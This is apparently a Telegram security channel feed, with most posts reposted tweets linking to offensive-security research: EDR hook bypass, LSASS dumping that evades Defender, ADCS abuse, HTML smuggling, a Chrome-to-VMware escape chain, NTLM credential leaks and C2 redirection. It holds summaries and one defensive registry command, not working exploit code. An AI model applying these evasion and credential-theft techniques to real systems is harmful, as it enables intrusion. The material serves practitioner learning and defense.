Forwarded from Внутрянка
Материал про пентест 1С
Ardent101
Еще 1 раз про пентест 1С
Введение Настоящий материал по большей части состоит из общедоступных наработок других людей. Целью было проверить указанные наработки на практике и собрать получившиеся результаты в одном месте. Именно этим объясняется название статьи.
Продолжу рассуждение…
Продолжу рассуждение…
🔥4
😈 [ Grzegorz Tworek @0gtweet ]
Eliminate huge part of lateral movement scenarios with one command:
It will make Service Control Manager deaf to remote management. Everything else works properly.
🐥 [ tweet ]
Eliminate huge part of lateral movement scenarios with one command:
reg.exe add HKLM\SYSTEM\CurrentControlSet\Control /v DisableRemoteScmEndpoints /t REG_DWORD /d 1
It will make Service Control Manager deaf to remote management. Everything else works properly.
🐥 [ tweet ]
👍10🔥1😁1😢1
😈 [ Winslow @senzee1984 ]
MutationGate is a new approach to bypass EDR's inline hooking by replacing an unhooked NTAPI's SSN with a hooked NTAPI's SSN at run time with hardware breakpoint.
🔗 https://winslow1984.com/books/malware/page/mutationgate
🔗 https://github.com/senzee1984/MutationGate
🐥 [ tweet ]
MutationGate is a new approach to bypass EDR's inline hooking by replacing an unhooked NTAPI's SSN with a hooked NTAPI's SSN at run time with hardware breakpoint.
🔗 https://winslow1984.com/books/malware/page/mutationgate
🔗 https://github.com/senzee1984/MutationGate
🐥 [ tweet ]
🔥9👍1
😈 [ Jonas Bülow Knudsen @Jonas_B_K ]
Wrote another blog post about yet another ADCS abuse technique. This one is about explicit certificate mapping 📌📃🗺️
🔗 https://medium.com/specter-ops-posts/adcs-esc14-abuse-technique-333a004dc2b9
🐥 [ tweet ]
Wrote another blog post about yet another ADCS abuse technique. This one is about explicit certificate mapping 📌📃🗺️
🔗 https://medium.com/specter-ops-posts/adcs-esc14-abuse-technique-333a004dc2b9
🐥 [ tweet ]
🔥3👍1
😈 [ Austin Hudson @ilove2pwn_ ]
"A Summary of Memory Obuscation & Building Chains": A simple blogpost that highlights the two concepts that I utilize to my advantage.
🔗 https://suspicious.actor/misc/2024/02/29/memory-obfuscation-tldr.html
🐥 [ tweet ]
"A Summary of Memory Obuscation & Building Chains": A simple blogpost that highlights the two concepts that I utilize to my advantage.
🔗 https://suspicious.actor/misc/2024/02/29/memory-obfuscation-tldr.html
🐥 [ tweet ]
🔥5🤔2👍1
😈 [ blackorbird @blackorbird ]
#Lazarus exploited a flaw in the Windows AppLocker driver (appid.sys) as a zero-day to gain kernel-level access and turn off security tools.CVE-2024-21338
Beyond BYOVD with an Admin-to-Kernel Zero-Day
🔗 https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/
🐥 [ tweet ]
#Lazarus exploited a flaw in the Windows AppLocker driver (appid.sys) as a zero-day to gain kernel-level access and turn off security tools.CVE-2024-21338
Beyond BYOVD with an Admin-to-Kernel Zero-Day
🔗 https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/
🐥 [ tweet ]
👍7🔥3
😈 [ CODE WHITE GmbH @codewhitesec ]
Struggeling to get those precious certificates with #certipy and AD CS instances that do not support web enrollment and do not expose CertSvc via RPC? @qtc_de has you covered and added functionality to use DCOM instead of good old RPC #redteaming
🔗 https://github.com/ly4k/Certipy/pull/201
🐥 [ tweet ]
Struggeling to get those precious certificates with #certipy and AD CS instances that do not support web enrollment and do not expose CertSvc via RPC? @qtc_de has you covered and added functionality to use DCOM instead of good old RPC #redteaming
🔗 https://github.com/ly4k/Certipy/pull/201
🐥 [ tweet ]
🔥7
😈 [ Grzegorz Tworek @0gtweet ]
Writable SYSVOL --> Domain Admin:
🔗 http://x.com/i/article/1763673505873240064
🐥 [ tweet ]
Writable SYSVOL --> Domain Admin:
🔗 http://x.com/i/article/1763673505873240064
🐥 [ tweet ]
👍3🔥1🤔1
😈 [ Ninad Mishra @NinadMishra5 ]
Nice blog about Recon Automation using tools like Subfinder, Chaos, Nuclei, Httpx, Notify, and Anew to find bugs and vulnerabilities.
🔗 https://dhiyaneshgeek.github.io/bug/bounty/2020/02/06/recon-with-me/
🐥 [ tweet ]
Nice blog about Recon Automation using tools like Subfinder, Chaos, Nuclei, Httpx, Notify, and Anew to find bugs and vulnerabilities.
🔗 https://dhiyaneshgeek.github.io/bug/bounty/2020/02/06/recon-with-me/
🐥 [ tweet ]
🔥3
😈 [ zimnyaa @zimnyaatishina ]
I’ve tried replicating some basic AD techniques in FreeIPA:
There’s still a lot to explore, so I’ll return to it at some point in the future.
🔗 https://tishina.in/ops/freeipa-postexploitation
🐥 [ tweet ]
I’ve tried replicating some basic AD techniques in FreeIPA:
There’s still a lot to explore, so I’ll return to it at some point in the future.
🔗 https://tishina.in/ops/freeipa-postexploitation
🐥 [ tweet ]
🔥7👍2
😈 [ Thorsten E. @endi24 ]
Script to perform some hardening of Windows OS
by @mackwage
🔗 https://gist.github.com/mackwage/08604751462126599d7e52f233490efe
🐥 [ tweet ]
Script to perform some hardening of Windows OS
by @mackwage
🔗 https://gist.github.com/mackwage/08604751462126599d7e52f233490efe
🐥 [ tweet ]
👍3🔥1🤔1
😈 [ Octoberfest7 @Octoberfest73 ]
Check out my latest blog post released during my internship at @RedSiege where I explore how a method for dumping LSASS popularized in 2019 can avoid detection by Microsoft Defender for Endpoint in 2024:
🔗 https://redsiege.com/blog/2024/03/dumping-lsass-like-its-2019/
🐥 [ tweet ]
Check out my latest blog post released during my internship at @RedSiege where I explore how a method for dumping LSASS popularized in 2019 can avoid detection by Microsoft Defender for Endpoint in 2024:
🔗 https://redsiege.com/blog/2024/03/dumping-lsass-like-its-2019/
🐥 [ tweet ]
🔥7👍1
😈 [ delivr.to @delivr_to ]
A fresh take on traditional HTML smuggling techniques - Rust-based WebAssembly payloads that can call native JavaScript functions 👀
Read our latest blog for code examples, delivr.to payloads and detection rules:
🔗 https://blog.delivr.to/webassembly-smuggling-it-wasmt-me-648a62547ff4
🐥 [ tweet ]
A fresh take on traditional HTML smuggling techniques - Rust-based WebAssembly payloads that can call native JavaScript functions 👀
Read our latest blog for code examples, delivr.to payloads and detection rules:
🔗 https://blog.delivr.to/webassembly-smuggling-it-wasmt-me-648a62547ff4
🐥 [ tweet ]
🔥3👍1
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ Theori @theori_io ]
Do you use a virtual machine to browse dangerous links safely? If you use the Chrome browser inside that virtual machine, is it secure enough?
As you might have guessed, the answer is not so much.
We chained six unique CVEs from 2023 listed below.
• Chrome Renderer RCE: CVE-2023-3079
• Chrome Sandbox Escape: CVE-2023-21674
• LPE in guest OS: CVE-2023-29360
• VMware Info Leak: CVE-2023-34044
• VMware Escape: CVE-2023-20869
• LPE in host OS: CVE-2023-36802
Over the next few weeks, we will be releasing the detailed analysis write-ups on each vulnerability used in this chain on our blog.
All of these CVEs are featured in Fermium-252, our Cyber Threat Intelligence Database Platform.
You can check out the information about Fermium-252 on our website and blog post:
🔗 https://theori.io/service/vr#fermium
🔗 https://blog.theori.io/fermium-252-the-cyber-threat-intelligence-database-b30ce06e7c5e?source=social.tw
🐥 [ tweet ]
Do you use a virtual machine to browse dangerous links safely? If you use the Chrome browser inside that virtual machine, is it secure enough?
As you might have guessed, the answer is not so much.
We chained six unique CVEs from 2023 listed below.
• Chrome Renderer RCE: CVE-2023-3079
• Chrome Sandbox Escape: CVE-2023-21674
• LPE in guest OS: CVE-2023-29360
• VMware Info Leak: CVE-2023-34044
• VMware Escape: CVE-2023-20869
• LPE in host OS: CVE-2023-36802
Over the next few weeks, we will be releasing the detailed analysis write-ups on each vulnerability used in this chain on our blog.
All of these CVEs are featured in Fermium-252, our Cyber Threat Intelligence Database Platform.
You can check out the information about Fermium-252 on our website and blog post:
🔗 https://theori.io/service/vr#fermium
🔗 https://blog.theori.io/fermium-252-the-cyber-threat-intelligence-database-b30ce06e7c5e?source=social.tw
🐥 [ tweet ]
👍10🔥3😢1
😈 [ n0km @n0km ]
New examples GetADComputers.py and readLAPS.py are now merged in impacket's master branch. Go check them out. Thanks F-Masood
🔗 https://github.com/fortra/impacket/pull/1673
🐥 [ tweet ]
New examples GetADComputers.py and readLAPS.py are now merged in impacket's master branch. Go check them out. Thanks F-Masood
🔗 https://github.com/fortra/impacket/pull/1673
🐥 [ tweet ]
🔥6
Forwarded from PT SWARM
🎁 Source Code Disclosure in IIS 10.0! Almost.
There is a method to reveal the source code of some .NET apps. Here's how it works.
👉 https://swarm.ptsecurity.com/source-code-disclosure-in-asp-net-apps/
There is a method to reveal the source code of some .NET apps. Here's how it works.
👉 https://swarm.ptsecurity.com/source-code-disclosure-in-asp-net-apps/
🔥12
😈 [ SEKTOR7 Institute @SEKTOR7net ]
Wondering what telemetry an EDR collects?
Wonder no more! @Kostastsale and @ateixei run an EDR Telemetry Project, covering all major EDRs:
"The main goal of the EDR Telemetry project is to encourage EDR vendors to be more transparent about the telemetry they provide".
Blog:
🔗 https://detect.fyi/edr-telemetry-project-a-comprehensive-comparison-d5ed1745384b
Table:
🔗 https://docs.google.com/spreadsheets/d/1ZMFrD6F6tvPtf_8McC-kWrNBBec_6Si3NW6AoWf3Kbg/edit?usp=sharing
Github:
🔗 https://github.com/tsale/EDR-Telemetry
🐥 [ tweet ]
Wondering what telemetry an EDR collects?
Wonder no more! @Kostastsale and @ateixei run an EDR Telemetry Project, covering all major EDRs:
"The main goal of the EDR Telemetry project is to encourage EDR vendors to be more transparent about the telemetry they provide".
Blog:
🔗 https://detect.fyi/edr-telemetry-project-a-comprehensive-comparison-d5ed1745384b
Table:
🔗 https://docs.google.com/spreadsheets/d/1ZMFrD6F6tvPtf_8McC-kWrNBBec_6Si3NW6AoWf3Kbg/edit?usp=sharing
Github:
🔗 https://github.com/tsale/EDR-Telemetry
🐥 [ tweet ]
🔥3👍2
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ Akamai Security Intelligence Group @akamai_research ]
Today’s Theme is vulnerability 👀
Akamai researchers have discovered a vuln in Windows Themes that can trigger an authentication coercion - with almost zero user interaction.
User views the file, Explorer sends SMB packets with credentials.
Full post:
🔗 https://www.akamai.com/blog/security-research/2024/mar/leaking-ntlm-credentials-through-windows-themes
🐥 [ tweet ]
Today’s Theme is vulnerability 👀
Akamai researchers have discovered a vuln in Windows Themes that can trigger an authentication coercion - with almost zero user interaction.
User views the file, Explorer sends SMB packets with credentials.
Full post:
🔗 https://www.akamai.com/blog/security-research/2024/mar/leaking-ntlm-credentials-through-windows-themes
🐥 [ tweet ]
😁2🥱2👍1
😈 [ Pen Test Partners @PenTestPartners ]
SSH Split Tunnelling attacks are not new but with so many organisations still using the MS native SSH client they can be deadly effective- if all the holes in the cheese line up. It needs minimal setup and reduces likelihood of Blue team detection.
🔗 https://www.pentestpartners.com/security-blog/living-off-the-land-with-native-ssh-and-split-tunnelling/
🐥 [ tweet ]
SSH Split Tunnelling attacks are not new but with so many organisations still using the MS native SSH client they can be deadly effective- if all the holes in the cheese line up. It needs minimal setup and reduces likelihood of Blue team detection.
🔗 https://www.pentestpartners.com/security-blog/living-off-the-land-with-native-ssh-and-split-tunnelling/
🐥 [ tweet ]
🔥1
😈 [ Winslow @senzee1984 ]
My new article revisits classic technique Reflective Loading, and explains my tool InflativeLoading.
🔗 https://winslow1984.com/books/malware/page/reflectiveloading-and-inflativeloading
Thank @0xBoku @MalDevAcademy @stephenfewer @hasherezade and all other authors(and their articles/tools/projects) for the inspiration and help.
🐥 [ tweet ]
My new article revisits classic technique Reflective Loading, and explains my tool InflativeLoading.
🔗 https://winslow1984.com/books/malware/page/reflectiveloading-and-inflativeloading
Thank @0xBoku @MalDevAcademy @stephenfewer @hasherezade and all other authors(and their articles/tools/projects) for the inspiration and help.
🐥 [ tweet ]
👍3🔥3
😈 [ Rasta Mouse @_RastaMouse ]
[BLOG]
Small experiment with using YARP as a C2 redirector.
🔗 https://rastamouse.me/yarp-as-a-c2-redirector/
🐥 [ tweet ]
[BLOG]
Small experiment with using YARP as a C2 redirector.
🔗 https://rastamouse.me/yarp-as-a-c2-redirector/
🐥 [ tweet ]
👍6